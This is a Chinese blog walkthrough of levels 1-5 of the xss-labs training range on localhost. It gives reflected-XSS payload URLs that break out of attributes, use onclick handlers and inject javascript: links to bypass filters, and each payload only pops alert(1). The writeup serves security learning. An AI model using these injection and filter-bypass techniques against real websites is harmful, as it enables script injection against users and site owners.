xss-labs详解

已于 2022-09-30 16:05:45 修改
阅读量323 收藏
点赞数 1
文章标签: xss javascript 前端 web安全
于 2022-09-30 16:05:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52385170/article/details/127123761
版权

level1

payload:

http://127.0.0.1/xss-labs/level1.php?name=<script>alert(1)</script>

level2

payload:

http://127.0.0.1/xss-labs/level2.php?keyword="><script>alert(1)</script>//

在这里插入图片描述
在这里插入图片描述

查看后台源代码发现htmlspecialchars()函数对变量str进行处理之后显示到网页上。
在这里插入图片描述
接下来我们从第二个test处进行构造,但是问题是这里的test在标签属性值中,浏览器是无法执行的,要想浏览器执行这里的弹窗代码,只需要将属性的引号和标签先闭合就可以了。
左边的">去闭合原先的<"
右边的//去注释原先的">
在这里插入图片描述

level3

payload:

http://127.0.0.1/xss-labs/level3.php?keyword='>οnclick='javascript:alert(1)'//

首先通过第二关的payload尝试一下
在这里插入图片描述
我们发现猜测服务器端在这两处都用 htmlspecialchars() 函数,将特殊符号转换成HTML实体。
这时候我们的思路就尽量要绕开使用新标签,那么浏览器还有一些事件可以执行js代码
在这里插入图片描述
所以我们利用onclick事件执行。

levle4

payload:

http://127.0.0.1/xss-labs/level4.php?keyword=">onclick='javascript:alert(1)'//

在这里插入图片描述
我们发现与level3相比,只是单引号和双引号的区别。

level5

payload:

http://127.0.0.1/xss-labs/level5.php?keyword="></input><a href='javascript:alert(1)'>accept</a>//

使用上一关的payload,查看源码发现script过滤了,onclick也过滤了
在这里插入图片描述

尝试构造a标签

点击accept即可通过本关
"></input><a href='javascript:alert(1)'>accept</a>//
HypeRong
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
xss-labs通关详解 Level 1-5
qq_41755084的博客
10-25 838
测试xss漏洞的JavaScript弹窗代码:
xss-labs.zip
06-25
xss-labs,该环境是用于练习xss跨站脚本攻击的一个集成环境,属于闯关类型。将该环境里的xss类型全部通过,有助于理解xss的攻击原理。
xss-labs通关大详解
shayebudon的博客
10-31 1087
目录 level1 level2 level3 level4 level5 level6 level7 level8 level9 xss-labs level1 观察三处箭头,可以发现它是向服务器提交了一个name参数,值为“test”,从页面 回显来看,将neme参数的值显示在了页面上,并且显示了name参数值的字符长度 接下来,查看源码 他将name的参数值放到了<h2></h2>之间 将name的参数重新赋值:&lt...
XSS-labs详解
最新发布
ytdd66的博客
03-23 1460
进入靶场点击图片,开始我们的XSS之旅!
xss-labs详解(上)1-10
hxhxhxhxx的博客
08-02 1128
xss-labs详解Level 1Level 2htmlspecialcharsLevel 3Level 4Level 5Level 6Level 7Level 8Level 9LevelLevelLevelLevel Level 1 源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-
xss-labs详解(下)11-20
hxhxhxhxx的博客
08-05 890
xss-labs详解Level 11Level 12Level 13Level 14Level 15ng-includeonerrorLevel 16Level 17Level 18Level 19Level 20 Level 11 查看一波源代码,发现可能在这里存在xss 那么我们使用burp抓包,修改 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss-labs-master源码
07-06
20关xss靶场练习,帮助了解关于xss
xss-labs通关详解 Level 6-10
qq_41755084的博客
10-25 929
这一关整体上与第五关类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
xsslabs.zip
07-23
xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法,是学习xss的必备工具
xss-labs
遇事不决冲冲冲
05-19 1888
前言 这里我主要记录我在做xss-labs时的方法和步骤,并对每关的防守绕过方式稍作总结,所以 第一关
xss-labs通关大合集
热门推荐
wo41ge的博客
07-26 3万+
xss-labs 文章所用的xss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs 然后开始通关 level1 仔细观察三处箭头,可以发现它是向服务器提交了一个name参数,值为“test”,从页面 回显来看,将neme参数的值显示在了页面上,并且显示了name参数值的字符长度 接下来,查看源码 从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间 那么 就很明显,这一关主要就是考察反射型xss 但是由于不
XSS-labs
Mccc_li的博客
04-09 1067
大佬总结的xss的原理 1.level1 输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器 为什么能够运行? GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。 常见...
xss-labs通关详解
09-18
xss-labs是一个测试平台,用于演示和测试跨站脚本攻击(XSS)漏洞。在这个平***构造特定的代码,我们可以在平台上触发XSS漏洞,从而实现攻击目的。 在第6关中,我们可以看到源码中对一些字符进行了替换,但并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HypeRong

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值